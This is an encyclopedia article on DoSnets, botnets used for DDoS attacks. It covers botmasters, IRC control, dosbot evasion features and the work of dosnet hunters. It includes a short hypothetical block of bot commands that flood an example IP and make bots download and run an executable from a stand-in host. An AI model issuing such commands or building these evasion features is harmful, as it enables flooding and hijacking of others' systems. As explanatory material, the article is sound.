DoSnet

DoSnet

A DoSnet (Denial of Service network) is a type of botnet/malware and mostly used as a term for malicious botnets while benevolent botnets often simply are referred to as botnets. Dosnets are used for Distributed Denial of Service (DDoS) attacks which can be very devastating.

They range in size from a couple of bots to a couple of thousand bots up to over a hundred thousand bots.

Many dosbots use the IRC protocol, but some use their own custom protocols. Some may use a decentralized P2P network. When IRC is used, the botmaster often has usermode +i (invisible) and the channel often has mode +psntk (private, secret, and need password to join). Sometimes the network is hosted on a public IRC network, while more capable botmasters host the network on private servers.

More advanced dosnets use technologies such as SSL connections and cryptography to prevent packet sniffing, data inspection, and analysis.

The botmaster can use the bots to "packet" (send a disruptive data flood) to other computers or networks. He/she can often also make them perform various other tasks, such as remotely fetching a new version of the bot software and updating themselves.

Well-known dosnet software includes TFN2k, Stacheldraht, and Trinoo.

There are dosnet hunters who find dosnets and analyze the bots and/or the network in order to dismantle them. For example by discovering access to bots and commanding them to "uninstall" themselves if such a feature is present in the bot software, or to "update" themselves to a dud, or to download and execute some sort of cleaner. Advanced bots may use cryptographically signed updates to make sure the update is authentic.

Contents

Botmaster

The botmaster is the person who controls these bots/drones. He/she usually connects to the network via proxies, bouncers or shells to hide his IP address for anonymity and uses a password to authenticate himself. When the bots have verified the password (and possible other criteria for authentication) they are under botmaster's command. Sometimes the botnet is shared, and multiple botmasters operate it together.

A botmaster may be a skilled black hat hacker or just a mere script kiddie.

Sometimes botmasters hijack bots from the dosnet of another botmaster by analyzing the bot or network, discovering the password, and commanding the bots to "update" themselves to his ownership.

Hypothetical example usage

.login my54kingdom78
.icmpflood 192.0.2.123 3500

.login my54kingdom78
.update https://www.example.com/lolcat/mudkipz.exe

Dosbot

The dosbot (Denial of Service bot, also called Distributed Denial of Service agent) is the client which is used to connect to the network and is also the software which performs any attacks. The executable is usually stripped of symbols and compressed with tools (such as UPX) to obfuscate the contents and to prevent reverse engineering. It's usually coded to automatically startup every time the computer (re)starts, and is also programmed to hide itself. Authentication is usually done by comparing the supplied password against a plaintext string or a cryptographic hash (such as MD5 or SHA-1), which may be salted for additional security.

Sometimes dosbots are installed together with a rootkit which is to prevent the bot from detection.

They can often perform more than only one kind of attack. Attacks include TCP, UDP, ICMP attacks. Advanced bots may use raw sockets and construct custom packets to perform SYN floods and other spoofing attacks.

Computers infected with dosbot agents are referred to as "zombies".

The vast majority of the bots are written in the C or C++ programming languages.

Many new bots are now infecting people via Java applets, so when a person with Java enabled visits a web page, the bot will execute Java code, and can then issue commands to connect to the DoSnet.[citation needed]

Commands for the bot may use a prefix such as an exclamation mark, at sign (@), or dot.

It may try to terminate the process of known antivirus and antimalware software in order to protect itself. It may disable security and update services.

It may copy itself into a randomly named file, or disguise itself with a name similar to a system service/process.

It may attempt to remove rival malware in order to prevent the system from behaving suspiciously.

It may try to disable the firewall or add rules to open certain ports or allow certain connections.

It may include anti-debugging functionality.

See also

Monitor padlock.svg Computer security portal
v · d · eBotnets
Notable botnets
Akbot · Asprox · Bagle · Bredolab · Cutwail · Donbot · Grum · Gumblar  · Kraken · Lethic · Mariposa · Mega-D · Metulji · Rustock · Srizbi · Storm · Torpig · Waledac · Zeus
Main articles
Computer worm · Malbot · Malware · Operation: Bot Roast · Dosnet

Wikimedia Foundation. 2010.

Игры ⚽ Поможем сделать НИР

Look at other dictionaries:

  • Dosnet — A Dosnet (Denial of Service Network) is a type of botnet/malware and mostly used as a term for malicious botnets while benevolent botnets often simply are referred to as botnets. Dosnets are used for Distributed Denial of Service (DDoS) attacks… …   Wikipedia

  • Denial-of-service attack — DoS redirects here. For other uses, see DOS (disambiguation). DDoS Stacheldraht Attack diagram. A denial of service attack (DoS attack) or distributed denial of service attack (DDoS attack) is an attempt to make a computer resource unavailable to …   Wikipedia

  • Botnet — is a jargon term for a collection of software robots, or bots, that run autonomously and automatically. The term is often associated with malicious software but it can also refer to the network of computers using distributed computing… …   Wikipedia

  • Storm botnet — The typical lifecycle of spam that originates from a botnet: (1) Spammer s web site (2) Spammer (3) Spamware (4) Infected computers (5) Virus or trojan (6) Mail servers (7) Users (8) Web traffic The Storm… …   Wikipedia

  • Conficker — Common name Aliases Mal/Conficker A(Sophos) Win32/Conficker.A (CA) W32.Downadup (Symantec) W32/Downadup.A (F Secure) Conficker.A (Panda) Net Worm.Win32.Kido.bt ( …   Wikipedia

  • Cutwail botnet — The Cutwail botnet, founded around 2007[1] and also known by its aliases of Pushdo and Pandex[2], is a botnet mostly involved in DDoS attacks and sending spam e mails. Contents 1 Operations 2 See also …   Wikipedia

  • Donbot botnet — Donbot, also known by its aliases Buzus and Bachsoy,[1] is a botnet mostly involved in sending pharmaceutical and stock based e mail spam.[2][3] The Donbot botnet is thought to consist of roughly 125,000 individual computers,[2] which combined… …   Wikipedia

  • Zeus (trojan horse) — Zbot redirects here. For the action figures, see Zbots. For other uses, see Zeus (disambiguation). Zeus is a Trojan horse that steals banking information by keystroke logging and Form Grabbing. Zeus is spread mainly through drive by downloads and …   Wikipedia

  • Mariposa botnet — The Mariposa botnet, discovered December 2008,[1] is a botnet mainly involved in cyberscamming and denial of service attacks.[2][3] Before the botnet itself was dismantled on December 23, 2009, it consisted of 8 to 12 million individual… …   Wikipedia

  • Mega-D botnet — The Mega D, also known by its alias of Ozdok, is a botnet that at its peak was responsible for sending between 30% and 35% of spam worldwide.[1][2][3] On October 14, 2008, the U.S Federal Trade Commission, in cooperation with Marshal Software,… …   Wikipedia

Share the article and excerpts

Direct link
Do a right-click on the link above
and select “Copy Link”